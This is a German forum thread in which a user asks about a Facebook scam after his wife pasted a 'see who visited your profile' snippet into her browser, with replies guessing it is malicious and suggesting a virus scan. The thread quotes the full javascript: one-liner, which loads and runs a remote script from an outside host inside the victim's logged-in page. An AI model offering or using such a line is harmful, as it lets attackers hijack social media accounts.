Facebook Script (Virus) ?

Der Don

Ensign
Hallo
meine Frau bekam im FB eine Einladung auf eine Seite wo sie sehen kann wer alles auf ihrer Seite war. Dazu sollte sie dieses Script in die Browserleiste einfügen, was sie auch gleich gemacht hat. :freak:

"javascript:(a=(b=document).createElement('script')).src='//whospyyou.googlecode.com/files/pad.js?'+Math.random(),b.body.appendChild(a);void(0)"

Was ist das für ein Script, und bekomme ich das wieder weg? War das schlimm?

Der Script verweißt auf einen Script (//whospyyou.googlecode.com/files/pad.js), auch eine Javascript Datei. Ich schätze mal, dass dieser Bösartig ist.:(

Haha ja da es per Phishing und co nicht mehr so recht funktioniert wirds jetzt per Facebook probiert - und das wohl noch mit Erfolg. :D

Lass einfahc mal deinen Virenscanner drüberlaufen sollte der nix finden würde ich mir vorerst keien sorgen machen.(Vielleicht noch Browser-Cache und Cookies löschen^^)

Hab die Anfrage auch schon 10 mal erhalten hab mir den Scriptschnippsel auch angeschaut und der kam mir spanisch vor (ich hab absolut keine Ahnung von Java-Script) hab aber mal gedacht da in Java *.random ne zufallszahl erstellt wird es da auch so ähnlich sein und hab dann einfahc die Finger davon gelassen^^

Danke
Die Links sind sehr hilfreich. Was ich aber noch nicht ganz verstehe ob ich nun schon einen Trojaner usw. drauf habe? Mein Virenscanner und Hijackthis haben nix gefunden,

Zuletzt bearbeitet:
Was auch gut ist: Facecrooks auf FB in suchleiste eingeben. Dort wird man vor neuen SCAMS gewarnt.

Zurück
Oben